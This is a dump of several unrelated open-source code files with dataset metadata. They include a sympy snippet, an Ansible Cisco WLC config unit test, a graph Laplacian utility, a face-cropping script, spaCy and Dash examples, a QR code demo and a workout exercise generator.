[ "MIT" ]
null
null
null
misc/sympy_play/sympy_test.py
YoshimitsuMatsutaIe/hoge_flow_test
22e2e2ce043a3107bd06449f6f9958641293e414
[ "MIT" ]
null
null
null
import sympy as sy from sympy.printing.pycode import pycode t = sy.Symbol("t") q1 = sy.Function("q1") q2 = sy.Function("q2") q3 = sy.Function("q3") q4 = sy.Function("q4") q5 = sy.Function("q5") q6 = sy.Function("q6") qvec = sy.Matrix([[q1(t), q2(t), q3(t), q4(t), q5(t), q6(t)]]).T l0, l1, l2, l3, l4, l5, l6, h45 = sy.symbols("l0, l1, l2, l3, l4, l5, l6, h45") posi_1 = sy.Matrix([[0, 0, 0]]).T posi_2 = posi_1 + sy.Matrix([[0, 0, l0]]).T posi_3 = posi_2 + sy.Matrix([[0, 0, l1]]).T code = pycode(posi_3) print(code)
22.782609
79
0.593511
4357c36b2b65963566cfb1c5dcedc1eb5e1a7ceb
5,640
py
Python
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/aireos/test_aireos_config.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/aireos/test_aireos_config.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/tests/unit/modules/network/aireos/test_aireos_config.py
tr3ck3r/linklight
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
[ "MIT" ]
null
null
null
# # (c) 2016 Red Hat Inc. # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # Make coding more python3-ish from __future__ import (absolute_import, division, print_function) __metaclass__ = type from ansible_collections.community.general.tests.unit.compat.mock import patch from ansible_collections.community.general.plugins.modules.network.aireos import aireos_config from ansible_collections.community.general.tests.unit.modules.utils import set_module_args from ..aireos_module import TestCiscoWlcModule, load_fixture class TestCiscoWlcConfigModule(TestCiscoWlcModule): module = aireos_config def setUp(self): super(TestCiscoWlcConfigModule, self).setUp() self.mock_get_config = patch('ansible_collections.community.general.plugins.modules.network.aireos.aireos_config.get_config') self.get_config = self.mock_get_config.start() self.mock_load_config = patch('ansible_collections.community.general.plugins.modules.network.aireos.aireos_config.load_config') self.load_config = self.mock_load_config.start() self.mock_run_commands = patch('ansible_collections.community.general.plugins.modules.network.aireos.aireos_config.run_commands') self.run_commands = self.mock_run_commands.start() self.mock_save_config = patch('ansible_collections.community.general.plugins.modules.network.aireos.aireos_config.save_config') self.save_config = self.mock_save_config.start() def tearDown(self): super(TestCiscoWlcConfigModule, self).tearDown() self.mock_get_config.stop() self.mock_load_config.stop() self.mock_run_commands.stop() def load_fixtures(self, commands=None): config_file = 'aireos_config_config.cfg' self.get_config.return_value = load_fixture(config_file) self.load_config.return_value = None def test_aireos_config_unchanged(self): src = load_fixture('aireos_config_config.cfg') set_module_args(dict(src=src)) self.execute_module() def test_aireos_config_src(self): src = load_fixture('aireos_config_src.cfg') set_module_args(dict(src=src)) commands = ['sysname foo', 'interface address dynamic-interface mtc-1 10.33.20.4 255.255.255.0 10.33.20.2'] self.execute_module(changed=True, commands=commands) def test_aireos_config_backup(self): set_module_args(dict(backup=True)) result = self.execute_module() self.assertIn('__backup__', result) def test_aireos_config_save(self): set_module_args(dict(save=True)) self.execute_module() self.assertEqual(self.save_config.call_count, 1) self.assertEqual(self.get_config.call_count, 0) self.assertEqual(self.load_config.call_count, 0) def test_aireos_config_before(self): set_module_args(dict(lines=['sysname foo'], before=['test1', 'test2'])) commands = ['test1', 'test2', 'sysname foo'] self.execute_module(changed=True, commands=commands, sort=False) def test_aireos_config_after(self): set_module_args(dict(lines=['sysname foo'], after=['test1', 'test2'])) commands = ['sysname foo', 'test1', 'test2'] self.execute_module(changed=True, commands=commands, sort=False) def test_aireos_config_before_after_no_change(self): set_module_args(dict(lines=['sysname router'], before=['test1', 'test2'], after=['test3', 'test4'])) self.execute_module() def test_aireos_config_config(self): config = 'sysname localhost' set_module_args(dict(lines=['sysname router'], config=config)) commands = ['sysname router'] self.execute_module(changed=True, commands=commands) def test_aireos_config_match_none(self): lines = ['sysname router', 'interface create mtc-1 1'] set_module_args(dict(lines=lines, match='none')) self.execute_module(changed=True, commands=lines, sort=False) def test_nxos_config_save_always(self): args = dict(save_when='always') set_module_args(args) self.execute_module() self.assertEqual(self.save_config.call_count, 1) self.assertEqual(self.get_config.call_count, 0) self.assertEqual(self.load_config.call_count, 0) def test_nxos_config_save_changed_true(self): args = dict(save_when='changed', lines=['sysname foo', 'interface create mtc-3 3']) set_module_args(args) self.execute_module(changed=True) self.assertEqual(self.save_config.call_count, 1) self.assertEqual(self.get_config.call_count, 1) self.assertEqual(self.load_config.call_count, 1) def test_nxos_config_save_changed_false(self): args = dict(save_when='changed') set_module_args(args) self.execute_module() self.assertEqual(self.save_config.call_count, 0) self.assertEqual(self.get_config.call_count, 0) self.assertEqual(self.load_config.call_count, 0)
42.727273
137
0.715071
605e5ba542465d236c99c1654f2d7138207ee55d
3,751
py
Python
research/cv/stgcn/src/utility.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
77
2021-10-15T08:32:37.000Z
2022-03-30T13:09:11.000Z
research/cv/stgcn/src/utility.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
3
2021-10-30T14:44:57.000Z
2022-02-14T06:57:57.000Z
research/cv/stgcn/src/utility.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
24
2021-10-15T08:32:45.000Z
2022-03-24T18:45:20.000Z
# Copyright 2021 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """ Calculate laplacian matrix, used to network weight. Evaluate the performance of net work. """ import numpy as np import mindspore.ops as ops from scipy.linalg import fractional_matrix_power from scipy.sparse.linalg import eigs def calculate_laplacian_matrix(adj_mat, mat_type): """ calculate laplacian matrix used for graph convolution layer. """ n_vertex = adj_mat.shape[0] # row sum deg_mat_row = np.asmatrix(np.diag(np.sum(adj_mat, axis=1))) # column sum #deg_mat_col = np.asmatrix(np.diag(np.sum(adj_mat, axis=0))) deg_mat = deg_mat_row adj_mat = np.asmatrix(adj_mat) id_mat = np.asmatrix(np.identity(n_vertex)) # Combinatorial com_lap_mat = deg_mat - adj_mat # For SpectraConv # To [0, 1] sym_normd_lap_mat = np.matmul(np.matmul(fractional_matrix_power(deg_mat, -0.5), \ com_lap_mat), fractional_matrix_power(deg_mat, -0.5)) # For ChebConv # From [0, 1] to [-1, 1] lambda_max_sym = eigs(sym_normd_lap_mat, k=1, which='LR')[0][0].real wid_sym_normd_lap_mat = 2 * sym_normd_lap_mat / lambda_max_sym - id_mat # For GCNConv wid_deg_mat = deg_mat + id_mat wid_adj_mat = adj_mat + id_mat hat_sym_normd_lap_mat = np.matmul(np.matmul(fractional_matrix_power(wid_deg_mat, -0.5), \ wid_adj_mat), fractional_matrix_power(wid_deg_mat, -0.5)) # Random Walk rw_lap_mat = np.matmul(np.linalg.matrix_power(deg_mat, -1), adj_mat) # For SpectraConv # To [0, 1] rw_normd_lap_mat = id_mat - rw_lap_mat # For ChebConv # From [0, 1] to [-1, 1] lambda_max_rw = eigs(rw_lap_mat, k=1, which='LR')[0][0].real wid_rw_normd_lap_mat = 2 * rw_normd_lap_mat / lambda_max_rw - id_mat # For GCNConv wid_deg_mat = deg_mat + id_mat wid_adj_mat = adj_mat + id_mat hat_rw_normd_lap_mat = np.matmul(np.linalg.matrix_power(wid_deg_mat, -1), wid_adj_mat) if mat_type == 'wid_sym_normd_lap_mat': return wid_sym_normd_lap_mat if mat_type == 'hat_sym_normd_lap_mat': return hat_sym_normd_lap_mat if mat_type == 'wid_rw_normd_lap_mat': return wid_rw_normd_lap_mat if mat_type == 'hat_rw_normd_lap_mat': return hat_rw_normd_lap_mat raise ValueError(f'ERROR: "{mat_type}" is unknown.') def evaluate_metric(model, dataset, scaler): """ evaluate the performance of network. """ mae, sum_y, mape, mse = [], [], [], [] for data in dataset.create_dict_iterator(): x = data['inputs'] y = data['labels'] y_pred = model(x) y_pred = ops.Reshape()(y_pred, (len(y_pred), -1)) y_pred = scaler.inverse_transform(y_pred.asnumpy()).reshape(-1) y = scaler.inverse_transform(y.asnumpy()).reshape(-1) d = np.abs(y - y_pred) mae += d.tolist() sum_y += y.tolist() mape += (d / y).tolist() mse += (d ** 2).tolist() MAE = np.array(mae).mean() MAPE = np.array(mape).mean() RMSE = np.sqrt(np.array(mse).mean()) #WMAPE = np.sum(np.array(mae)) / np.sum(np.array(sum_y)) return MAE, RMSE, MAPE
34.1
93
0.661157
717fc92d06d8b606ab09ed90b150aa3633d8cd8a
971
py
Python
face_sdk/api_usage/face_crop.py
weihaoxie/FaceX-Zoo
db0b087e4f4d28152e172d6c8d3767a8870733b4
[ "Apache-2.0" ]
1,329
2021-01-13T07:06:30.000Z
2022-03-31T07:23:39.000Z
face_sdk/api_usage/face_crop.py
weihaoxie/FaceX-Zoo
db0b087e4f4d28152e172d6c8d3767a8870733b4
[ "Apache-2.0" ]
115
2021-01-13T10:42:57.000Z
2022-03-28T03:57:52.000Z
face_sdk/api_usage/face_crop.py
weihaoxie/FaceX-Zoo
db0b087e4f4d28152e172d6c8d3767a8870733b4
[ "Apache-2.0" ]
351
2021-01-13T07:21:00.000Z
2022-03-29T14:11:39.000Z
""" @author: JiXuan Xu, Jun Wang @date: 20201015 @contact: [email protected] """ import sys sys.path.append('.') import logging mpl_logger = logging.getLogger('matplotlib') mpl_logger.setLevel(logging.WARNING) import logging.config logging.config.fileConfig("config/logging.conf") logger = logging.getLogger('api') import cv2 from core.image_cropper.arcface_cropper.FaceRecImageCropper import FaceRecImageCropper if __name__ == '__main__': image_path = 'api_usage/test_images/test1.jpg' image_info_file = 'api_usage/test_images/test1_landmark_res0.txt' line = open(image_info_file).readline().strip() landmarks_str = line.split(' ') landmarks = [float(num) for num in landmarks_str] face_cropper = FaceRecImageCropper() image = cv2.imread(image_path) cropped_image = face_cropper.crop_image_by_mat(image, landmarks) cv2.imwrite('api_usage/temp/test1_cropped.jpg', cropped_image) logger.info('Crop image successful!')
32.366667
86
0.760041
e0804ce8566aa4a1f9127885216a5c7be2e727e9
180
py
Python
exercises/en/solution_01_02_01.py
tuanducdesign/spacy-course
f8d092c5fa2997fccb3f367d174dce8667932b3d
[ "MIT" ]
2
2020-07-07T01:46:37.000Z
2021-04-20T03:19:43.000Z
exercises/en/solution_01_02_01.py
tuanducdesign/spacy-course
f8d092c5fa2997fccb3f367d174dce8667932b3d
[ "MIT" ]
null
null
null
exercises/en/solution_01_02_01.py
tuanducdesign/spacy-course
f8d092c5fa2997fccb3f367d174dce8667932b3d
[ "MIT" ]
null
null
null
# Import spaCy import spacy # Create the English nlp object nlp = spacy.blank("en") # Process a text doc = nlp("This is a sentence.") # Print the document text print(doc.text)
13.846154
32
0.705556
e0a1c10ae6390769c98af7f96fec6a9849765502
396
py
Python
exercises/ja/test_03_03.py
tuanducdesign/spacy-course
f8d092c5fa2997fccb3f367d174dce8667932b3d
[ "MIT" ]
2
2020-07-07T01:46:37.000Z
2021-04-20T03:19:43.000Z
exercises/ja/test_03_03.py
tuanducdesign/spacy-course
f8d092c5fa2997fccb3f367d174dce8667932b3d
[ "MIT" ]
null
null
null
exercises/ja/test_03_03.py
tuanducdesign/spacy-course
f8d092c5fa2997fccb3f367d174dce8667932b3d
[ "MIT" ]
null
null
null
def test(): assert nlp.meta["name"] == "core_news_sm", "正しいパイプラインをロードしましたか?" assert nlp.meta["lang"] == "ja", "正しいパイプラインをロードしましたか?" assert "print(nlp.pipe_names)" in __solution__, "パイプラインの名前をプリントしましたか?" assert "print(nlp.pipeline)" in __solution__, "パイプラインをプリントしましたか?" __msg__.good( "Well done!今あるパイプラインについて調べたくなったときは、nlp.pipe_namesやnlp.pipelineを使ってプリントしましょう。" )
39.6
85
0.707071
e809a6fba093e1a6e7525660b1fc58ee55f01ea9
7,631
py
Python
nayuki_qrcodegen/qrcodegen-demo.py
TG-Techie/HackUMass0111
603344064605979b85a2e142caf7a2a7439d60f5
[ "MIT" ]
1
2022-02-15T08:51:55.000Z
2022-02-15T08:51:55.000Z
hihope_neptune-oh_hid/00_src/v0.3/third_party/qrcodegen/python/qrcodegen-demo.py
dawmlight/vendor_oh_fun
bc9fb50920f06cd4c27399f60076f5793043c77d
[ "Apache-2.0" ]
1
2019-10-19T09:24:56.000Z
2019-10-20T05:37:06.000Z
hihope_neptune-oh_hid/00_src/v0.3/third_party/qrcodegen/python/qrcodegen-demo.py
dawmlight/vendor_oh_fun
bc9fb50920f06cd4c27399f60076f5793043c77d
[ "Apache-2.0" ]
1
2019-10-18T14:18:28.000Z
2019-10-18T14:18:28.000Z
# # QR Code generator demo (Python 2, 3) # # Run this command-line program with no arguments. The program computes a bunch of demonstration # QR Codes and prints them to the console. Also, the SVG code for one QR Code is printed as a sample. # # Copyright (c) Project Nayuki. (MIT License) # https://www.nayuki.io/page/qr-code-generator-library # # Permission is hereby granted, free of charge, to any person obtaining a copy of # this software and associated documentation files (the "Software"), to deal in # the Software without restriction, including without limitation the rights to # use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of # the Software, and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # - The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # - The Software is provided "as is", without warranty of any kind, express or # implied, including but not limited to the warranties of merchantability, # fitness for a particular purpose and noninfringement. In no event shall the # authors or copyright holders be liable for any claim, damages or other # liability, whether in an action of contract, tort or otherwise, arising from, # out of or in connection with the Software or the use or other dealings in the # Software. # from __future__ import print_function from qrcodegen import QrCode, QrSegment def main(): """The main application program.""" do_basic_demo() do_variety_demo() do_segment_demo() do_mask_demo() # ---- Demo suite ---- def do_basic_demo(): """Creates a single QR Code, then prints it to the console.""" text = u"Hello, world!" # User-supplied Unicode text errcorlvl = QrCode.Ecc.LOW # Error correction level # Make and print the QR Code symbol qr = QrCode.encode_text(text, errcorlvl) print_qr(qr) print(qr.to_svg_str(4)) def do_variety_demo(): """Creates a variety of QR Codes that exercise different features of the library, and prints each one to the console.""" # Numeric mode encoding (3.33 bits per digit) qr = QrCode.encode_text("314159265358979323846264338327950288419716939937510", QrCode.Ecc.MEDIUM) print_qr(qr) # Alphanumeric mode encoding (5.5 bits per character) qr = QrCode.encode_text("DOLLAR-AMOUNT:$39.87 PERCENTAGE:100.00% OPERATIONS:+-*/", QrCode.Ecc.HIGH) print_qr(qr) # Unicode text as UTF-8 qr = QrCode.encode_text(u"\u3053\u3093\u306B\u3061\u0077\u0061\u3001\u4E16\u754C\uFF01\u0020\u03B1\u03B2\u03B3\u03B4", QrCode.Ecc.QUARTILE) print_qr(qr) # Moderately large QR Code using longer text (from Lewis Carroll's Alice in Wonderland) qr = QrCode.encode_text( "Alice was beginning to get very tired of sitting by her sister on the bank, " "and of having nothing to do: once or twice she had peeped into the book her sister was reading, " "but it had no pictures or conversations in it, 'and what is the use of a book,' thought Alice " "'without pictures or conversations?' So she was considering in her own mind (as well as she could, " "for the hot day made her feel very sleepy and stupid), whether the pleasure of making a " "daisy-chain would be worth the trouble of getting up and picking the daisies, when suddenly " "a White Rabbit with pink eyes ran close by her.", QrCode.Ecc.HIGH) print_qr(qr) def do_segment_demo(): """Creates QR Codes with manually specified segments for better compactness.""" # Illustration "silver" silver0 = "THE SQUARE ROOT OF 2 IS 1." silver1 = "41421356237309504880168872420969807856967187537694807317667973799" qr = QrCode.encode_text(silver0 + silver1, QrCode.Ecc.LOW) print_qr(qr) segs = [ QrSegment.make_alphanumeric(silver0), QrSegment.make_numeric(silver1)] qr = QrCode.encode_segments(segs, QrCode.Ecc.LOW) print_qr(qr) # Illustration "golden" golden0 = u"Golden ratio \u03C6 = 1." golden1 = u"6180339887498948482045868343656381177203091798057628621354486227052604628189024497072072041893911374" golden2 = u"......" qr = QrCode.encode_text(golden0 + golden1 + golden2, QrCode.Ecc.LOW) print_qr(qr) segs = [ QrSegment.make_bytes(golden0.encode("UTF-8")), QrSegment.make_numeric(golden1), QrSegment.make_alphanumeric(golden2)] qr = QrCode.encode_segments(segs, QrCode.Ecc.LOW) print_qr(qr) # Illustration "Madoka": kanji, kana, Cyrillic, full-width Latin, Greek characters madoka = u"\u300C\u9B54\u6CD5\u5C11\u5973\u307E\u3069\u304B\u2606\u30DE\u30AE\u30AB\u300D\u3063\u3066\u3001\u3000\u0418\u0410\u0418\u3000\uFF44\uFF45\uFF53\uFF55\u3000\u03BA\u03B1\uFF1F" qr = QrCode.encode_text(madoka, QrCode.Ecc.LOW) print_qr(qr) kanjicharbits = [ # Kanji mode encoding (13 bits per character) 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 1, 0, 1, 0, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, ] segs = [QrSegment(QrSegment.Mode.KANJI, len(kanjicharbits) // 13, kanjicharbits)] qr = QrCode.encode_segments(segs, QrCode.Ecc.LOW) print_qr(qr) def do_mask_demo(): """Creates QR Codes with the same size and contents but different mask patterns.""" # Project Nayuki URL segs = QrSegment.make_segments("https://www.nayuki.io/") print_qr(QrCode.encode_segments(segs, QrCode.Ecc.HIGH, mask=-1)) # Automatic mask print_qr(QrCode.encode_segments(segs, QrCode.Ecc.HIGH, mask=3)) # Force mask 3 # Chinese text as UTF-8 segs = QrSegment.make_segments( u"\u7DAD\u57FA\u767E\u79D1\uFF08\u0057\u0069\u006B\u0069\u0070\u0065\u0064\u0069\u0061\uFF0C" "\u8046\u807D\u0069\u002F\u02CC\u0077\u026A\u006B\u1D7B\u02C8\u0070\u0069\u02D0\u0064\u0069" "\u002E\u0259\u002F\uFF09\u662F\u4E00\u500B\u81EA\u7531\u5167\u5BB9\u3001\u516C\u958B\u7DE8" "\u8F2F\u4E14\u591A\u8A9E\u8A00\u7684\u7DB2\u8DEF\u767E\u79D1\u5168\u66F8\u5354\u4F5C\u8A08" "\u756B") print_qr(QrCode.encode_segments(segs, QrCode.Ecc.MEDIUM, mask=0)) # Force mask 0 print_qr(QrCode.encode_segments(segs, QrCode.Ecc.MEDIUM, mask=1)) # Force mask 1 print_qr(QrCode.encode_segments(segs, QrCode.Ecc.MEDIUM, mask=5)) # Force mask 5 print_qr(QrCode.encode_segments(segs, QrCode.Ecc.MEDIUM, mask=7)) # Force mask 7 # ---- Utilities ---- def print_qr(qrcode): """Prints the given QrCode object to the console.""" border = 4 for y in range(-border, qrcode.get_size() + border): for x in range(-border, qrcode.get_size() + border): print(u"\u2588 "[1 if qrcode.get_module(x,y) else 0] * 2, end="") print() print() # Run the main program if __name__ == "__main__": main()
40.807487
187
0.679727
1c3ba2386427f1f11255eabaa7bd9f3ff079e2ff
604
py
Python
exercises/fr/solution_02_06.py
tuanducdesign/spacy-course
f8d092c5fa2997fccb3f367d174dce8667932b3d
[ "MIT" ]
null
null
null
exercises/fr/solution_02_06.py
tuanducdesign/spacy-course
f8d092c5fa2997fccb3f367d174dce8667932b3d
[ "MIT" ]
null
null
null
exercises/fr/solution_02_06.py
tuanducdesign/spacy-course
f8d092c5fa2997fccb3f367d174dce8667932b3d
[ "MIT" ]
null
null
null
import spacy nlp = spacy.blank("fr") # Importe les classes Doc et Span from spacy.tokens import Doc, Span words = ["Elle", "aime", "David", "Bowie"] spaces = [True, True, True, False] # Crée un doc à partir des mots et des espaces doc = Doc(nlp.vocab, words=words, spaces=spaces) print(doc.text) # Crée un span pour "David Bowie" à partir du doc # et assigne-lui le label "PER" span = Span(doc, 2, 4, label="PER") print(span.text, span.label_) # Ajoute le span aux entités du doc doc.ents = [span] # Affiche les textes et les labels des entités print([(ent.text, ent.label_) for ent in doc.ents])
24.16
51
0.698675
1c4b56892f8c2ec0da93fecc9edd8661dc47cbad
1,050
py
Python
examples/all_pattern.py
xinetzone/dash-tests
cd4526caa2f9d906915c31370b3487bdcef92aa4
[ "Apache-2.0" ]
1
2022-03-01T07:38:32.000Z
2022-03-01T07:38:32.000Z
examples/all_pattern.py
xinetzone/dash-tests
cd4526caa2f9d906915c31370b3487bdcef92aa4
[ "Apache-2.0" ]
12
2021-07-13T12:33:36.000Z
2021-07-14T05:25:19.000Z
examples/all_pattern.py
xinetzone/dash-book
1f624e87e2aa02c9931318918df969e44bdd2c07
[ "Apache-2.0" ]
null
null
null
from dash import dcc, html from dash.dependencies import Input, Output, State, ALL from app import app layout = html.Div([ html.Button("Add Filter", id="add-filter", n_clicks=0), html.Div(id='dropdown-container', children=[]), html.Div(id='dropdown-container-output') ]) @app.callback( Output('dropdown-container', 'children'), Input('add-filter', 'n_clicks'), State('dropdown-container', 'children')) def display_dropdowns(n_clicks, children): new_dropdown = dcc.Dropdown( id={ 'type': 'filter-dropdown', 'index': n_clicks }, options=[{'label': i, 'value': i} for i in ['NYC', 'MTL', 'LA', 'TOKYO']] ) children.append(new_dropdown) return children @app.callback( Output('dropdown-container-output', 'children'), Input({'type': 'filter-dropdown', 'index': ALL}, 'value') ) def display_output(values): return html.Div([ html.Div('Dropdown {} = {}'.format(i + 1, value)) for (i, value) in enumerate(values) ])
27.631579
61
0.607619
296caaca728dcc7dc00f0e5afcaeaeb1b1d89dfb
5,535
py
Python
rengine/exercises.py
noahsolomon0518/rengine
a544951c6b7dd707586cd3c4f84ddec554f1c96a
[ "MIT" ]
null
null
null
rengine/exercises.py
noahsolomon0518/rengine
a544951c6b7dd707586cd3c4f84ddec554f1c96a
[ "MIT" ]
null
null
null
rengine/exercises.py
noahsolomon0518/rengine
a544951c6b7dd707586cd3c4f84ddec554f1c96a
[ "MIT" ]
null
null
null
"""Exercise object that can effectively be utilized in workout class""" import random from statistics import mean from copy import deepcopy from typing import List, Tuple import numpy as np from rengine.config import EXERCISE_CATEGORY_DATA, EquipmentAvailable, MuscleGroup from rengine.config import ExerciseLoad, ExerciseType, EXERCISE_DF from rengine.config import ExperienceLevel def pick_random_exercise( muscle_groups_targeted: List[str], exercise_type: ExerciseType, allowed_loads: List[ExerciseLoad] = [ExerciseLoad.HEAVY, ExerciseLoad.MEDIUM, ExerciseLoad.LIGHT], experience_levels = [ExperienceLevel.BEGINNER, ExperienceLevel.INTERMEDIATE, ExperienceLevel.EXPERIENCED], equipment_available = EquipmentAvailable.ALL, excluded_exercise_names: List[str] = [] ): """Picks random exercise based on many parameters""" global EXERCISE_DF df = EXERCISE_DF.copy() if(equipment_available != EquipmentAvailable.ALL): df = df[df["Equipment"].isin(equipment_available)] df = df[ (~df["EXERCISE"].isin(excluded_exercise_names)) & (df["Muscle Group"].isin(muscle_groups_targeted)) & (df[exercise_type] == 1) & (df.loc[:,experience_levels].sum(axis = 1) > 0) ] df.index = range(len(df.iloc[:,0])) if(len(df) == 0): return None exercise_ind = random.randint(0, len(df.iloc[:,0]) - 1) exercise_chose = df.iloc[exercise_ind, :] return ExerciseFromTypePreset(exercise_chose["EXERCISE"], exercise_type, allowed_loads) def listify_if_non_iterable(obj): obj = deepcopy(obj) if(type(obj) in [tuple, list]): return obj return [obj] def get_variables_based_on_exercise_type_and_load(exercise_type: ExerciseType, exercise_load: ExerciseLoad): variables = EXERCISE_CATEGORY_DATA[exercise_type][exercise_load] return { "sets": variables["sets"], "rep_range": variables["rep_range"], "rest_time_range": variables["rest_time_range"] } def get_muscle_group(exercise_name): """Finds muscle group based on exercise name. If does not exist returns 'UNKNOWN'""" return EXERCISE_DF[EXERCISE_DF["EXERCISE"]==exercise_name]["Muscle Group"].values[0] class Exercise: """Basic implementation of an exercise""" def __init__(self, exercise_name: str, sets, rep_range: Tuple[int], rest_time_range: Tuple[float], muscle_group: MuscleGroup = None): self.exercise_name = exercise_name self.sets = sets self.rep_range = rep_range self.rest_time_range = rest_time_range self.muscle_group = muscle_group @property def length(self): """Length in minutes. Currently with assumption that each set takes 1 minute""" rest_time = listify_if_non_iterable(self.rest_time_range) return self.sets * (1 + mean(rest_time)) def __str__(self) -> str: return f"{{exercise_name: {self.exercise_name}, muscle_group: {self.muscle_group}, sets: {str(self.sets)}, rep_range: {str(self.rep_range)}, rest_time_range: {str(self.rest_time_range)}}}" class ExerciseFromTypePreset(Exercise): """Similar to Exercise class but sets, rep_range and rest_time determined by ExerciseType""" def __init__(self, exercise_name: str, exercise_type: ExerciseType, allowed_loads: List[ExerciseLoad] = [ExerciseLoad.HEAVY, ExerciseLoad.MEDIUM, ExerciseLoad.LIGHT], exercise_load: ExerciseLoad = None): self.exercise_type = exercise_type self.exercise_load = exercise_load or self.pick_random_load(allowed_loads) super().__init__(exercise_name = exercise_name, muscle_group = get_muscle_group(exercise_name),**get_variables_based_on_exercise_type_and_load(self.exercise_type, self.exercise_load)) def pick_random_load(self, allowed_loads): """Picks randomly the load based on ExerciseType and valid ExerciseLoad""" initial_probabilities = [EXERCISE_CATEGORY_DATA[self.exercise_type][load]["chance"] for load in allowed_loads] normalized_probabilities = [prob/sum(initial_probabilities) for prob in initial_probabilities] return np.random.choice(allowed_loads, p = normalized_probabilities) def __str__(self): return Exercise.__str__(self).rstrip("}") + f", exercise_type: {self.exercise_type}, exercise_load: {self.exercise_load}}}" class StrengthExercise(ExerciseFromTypePreset): def __init__(self, exercise_name: str, allowed_loads: List[ExerciseLoad] = [ExerciseLoad.HEAVY, ExerciseLoad.MEDIUM, ExerciseLoad.LIGHT], exercise_load: ExerciseLoad = None): super().__init__(exercise_name = exercise_name, exercise_type = ExerciseType.STRENGTH, allowed_loads=allowed_loads, exercise_load=exercise_load) class EnduranceExercise(ExerciseFromTypePreset): def __init__(self, exercise_name: str, allowed_loads: List[ExerciseLoad] = [ExerciseLoad.HEAVY, ExerciseLoad.MEDIUM, ExerciseLoad.LIGHT], exercise_load: ExerciseLoad = None): super().__init__(exercise_name = exercise_name, exercise_type = ExerciseType.ENDURANCE, allowed_loads=allowed_loads, exercise_load=exercise_load) class HypertExercise(ExerciseFromTypePreset): def __init__(self, exercise_name: str, allowed_loads: List[ExerciseLoad] = [ExerciseLoad.HEAVY, ExerciseLoad.MEDIUM, ExerciseLoad.LIGHT], exercise_load: ExerciseLoad = None): super().__init__(exercise_name = exercise_name, exercise_type = ExerciseType.HYPERTROPHY, allowed_loads=allowed_loads, exercise_load=exercise_load)
46.125
207
0.737308
d3c20ba30c799ad0c4ece97ff2f9f54b53c716dc
578
py
Python
pacman-termux/test/pacman/tests/fileconflict006.py
Maxython/pacman-for-termux
3b208eb9274cbfc7a27fca673ea8a58f09ebad47
[ "MIT" ]
23
2021-05-21T19:11:06.000Z
2022-03-31T18:14:20.000Z
source/pacman-6.0.1/test/pacman/tests/fileconflict006.py
Scottx86-64/dotfiles-1
51004b1e2b032664cce6b553d2052757c286087d
